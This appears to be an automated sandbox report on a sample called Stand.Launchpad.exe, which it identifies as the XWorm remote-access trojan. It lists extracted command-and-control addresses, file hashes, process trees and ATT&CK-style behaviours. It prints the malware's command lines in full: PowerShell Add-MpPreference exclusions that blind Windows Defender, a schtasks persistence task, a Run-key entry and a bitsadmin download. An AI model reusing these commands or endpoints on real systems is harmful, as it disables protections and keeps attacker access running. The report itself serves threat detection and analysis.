Analysis
-
max time kernel
150s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
31-05-2024 04:12
Static task
static1
Behavioral task
behavioral1
Sample
Stand.Launchpad.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
Stand.Launchpad.exe
Resource
win10v2004-20240226-en
General
-
Target
Stand.Launchpad.exe
-
Size
140KB
-
MD5
bec01d16b6f3c443eb3912042c1fc7f9
-
SHA1
436c7fabff54997f2e550754edea0ae791080c9b
-
SHA256
2aa6b748a1ee67ba3f68a53228bbc14ed8ce1285e1dde54d310e2ca8797eb779
-
SHA512
4101f563c479a22883a024cbd9ba9d5a46234a237471b14853a82263e96f0ac74eb101dd77a71aab98101c8cb1c9c15ed987a45b3540d300c6bb740b707b27e1
-
SSDEEP
3072:J5XMHZjqrraIh3GGKt6cGuPN1OHXFhTVR7NetgV:H85jqrWIhGlN1sVhTwtg
Malware Config
Extracted
xworm
127.0.0.1:40971
us3.localto.net:40971
Name1442-40971.portmap.host:40971
-
Install_directory
%Temp%
-
install_file
Stand.exe
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe family_xworm behavioral2/memory/3272-17-0x0000000000900000-0x0000000000920000-memory.dmp family_xworm -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 2336 powershell.exe 2276 powershell.exe 3560 powershell.exe 2996 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Stand.Launchpad.exemshta.exeStand.Launchpad.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Stand.Launchpad.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Stand.Launchpad.exe -
Drops startup file 2 IoCs
Processes:
Stand.Launchpad.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stand.lnk Stand.Launchpad.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stand.lnk Stand.Launchpad.exe -
Executes dropped EXE 1 IoCs
Processes:
Stand.Launchpad.exepid process 3272 Stand.Launchpad.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Stand.Launchpad.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Stand = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Stand.exe" Stand.Launchpad.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 7 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Modifies registry class 1 IoCs
Processes:
Stand.Launchpad.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings Stand.Launchpad.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
Stand.Launchpad.exepid process 3272 Stand.Launchpad.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeStand.Launchpad.exeStand.exepid process 2336 powershell.exe 2336 powershell.exe 2276 powershell.exe 2276 powershell.exe 2276 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 2996 powershell.exe 2996 powershell.exe 2996 powershell.exe 3272 Stand.Launchpad.exe 3272 Stand.Launchpad.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe 2412 Stand.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
Stand.Launchpad.exepowershell.exepowershell.exepowershell.exepowershell.exeStand.exedescription pid process Token: SeDebugPrivilege 3272 Stand.Launchpad.exe Token: SeDebugPrivilege 2336 powershell.exe Token: SeDebugPrivilege 2276 powershell.exe Token: SeDebugPrivilege 3560 powershell.exe Token: SeDebugPrivilege 2996 powershell.exe Token: SeDebugPrivilege 3272 Stand.Launchpad.exe Token: SeDebugPrivilege 2412 Stand.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Stand.Launchpad.exepid process 3272 Stand.Launchpad.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
Stand.Launchpad.exeStand.Launchpad.exemshta.exedescription pid process target process PID 4948 wrote to memory of 3284 4948 Stand.Launchpad.exe mshta.exe PID 4948 wrote to memory of 3284 4948 Stand.Launchpad.exe mshta.exe PID 4948 wrote to memory of 3284 4948 Stand.Launchpad.exe mshta.exe PID 4948 wrote to memory of 3272 4948 Stand.Launchpad.exe Stand.Launchpad.exe PID 4948 wrote to memory of 3272 4948 Stand.Launchpad.exe Stand.Launchpad.exe PID 3272 wrote to memory of 2336 3272 Stand.Launchpad.exe powershell.exe PID 3272 wrote to memory of 2336 3272 Stand.Launchpad.exe powershell.exe PID 3284 wrote to memory of 4064 3284 mshta.exe bitsadmin.exe PID 3284 wrote to memory of 4064 3284 mshta.exe bitsadmin.exe PID 3284 wrote to memory of 4064 3284 mshta.exe bitsadmin.exe PID 3272 wrote to memory of 2276 3272 Stand.Launchpad.exe powershell.exe PID 3272 wrote to memory of 2276 3272 Stand.Launchpad.exe powershell.exe PID 3272 wrote to memory of 3560 3272 Stand.Launchpad.exe powershell.exe PID 3272 wrote to memory of 3560 3272 Stand.Launchpad.exe powershell.exe PID 3272 wrote to memory of 2996 3272 Stand.Launchpad.exe powershell.exe PID 3272 wrote to memory of 2996 3272 Stand.Launchpad.exe powershell.exe PID 3272 wrote to memory of 2172 3272 Stand.Launchpad.exe schtasks.exe PID 3272 wrote to memory of 2172 3272 Stand.Launchpad.exe schtasks.exe PID 3284 wrote to memory of 2412 3284 mshta.exe Stand.exe PID 3284 wrote to memory of 2412 3284 mshta.exe Stand.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe"C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3284 -
C:\Windows\SysWOW64\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\Stand.exe3⤵
- Download via BitsAdmin
PID:4064
-
-
C:\Users\Admin\AppData\Local\Temp\Stand.exe"C:\Users\Admin\AppData\Local\Temp\Stand.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2412
-
-
-
C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe"C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3272 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2336
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.Launchpad.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Stand.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2996
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Stand" /tr "C:\Users\Admin\AppData\Local\Temp\Stand.exe"3⤵
- Creates scheduled task(s)
PID:2172
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4076 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:81⤵PID:1544
-
C:\Users\Admin\AppData\Local\Temp\Stand.exeC:\Users\Admin\AppData\Local\Temp\Stand.exe1⤵PID:1844
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
944B
MD57a451cd1316d70a65910773fee8c3a43
SHA1d2db32d5037153dd1d94565b51b5b385817a3c3d
SHA256862d25ed22075f3d1f5e8d29a3c6e050dc91e53a4dc653c3f0f7c627a12ee26c
SHA51260887f795036fbd6d25234c17dab4463a8a02f576ae8c07dd7b4c4ff1dba35f99b7301139ea051a7a80fdfc9e003a2f0c2dd0d444a82ecf87a3df21507332aa6
-
Filesize
944B
MD5cdf113430dd2b0560c16a4927250105c
SHA1d6d8ec180136a243cfba776439f1a5a303cdb18a
SHA2560fe47567ce2c2aee76f3a3befe6491b540b1367a2b4d9cdacdf5f7eea981a93d
SHA512968843bd781bf4a65d9c973b2bc7d576c7b5cb8585fe97c5082039f97b28659f7a4fa0cce654c6f1cf121631fa04de059c186aff30bdd98c19b86f358b000bfd
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
893B
MD5b0a6d4e05dc2225dd03902a3061a4041
SHA139c500eefbf78d7d51768edb6983c361213cb7b8
SHA25605e5c927c6366bebab2fb341d233887f503fb692d8f6880f7d1327b64705c1ee
SHA51296fb1e3046a0daddd6a17a38fcfa8ad6e00f8c4950cc7e46c8a79b24817b2f271229d15facaa510105d3c95234a9f095fdf8ff8bbb8099c47565bd955c316918
-
Filesize
108KB
MD5d51da3fa31165f2536dddad44974af34
SHA1703a62d92fbfe23611297715ca50bb82b4ff55a1
SHA2569cc68d4ab822bd8e5fd66f40b2c99bce04805505e593027aca67256ab63c6210
SHA5123adfaf5e251d974a9d576c71e51e3b1c59ddee2feecf281801166cf9448a3e51e6066737c06bee20089721630f4016f16ae7297061112cb23f2fe786386e4197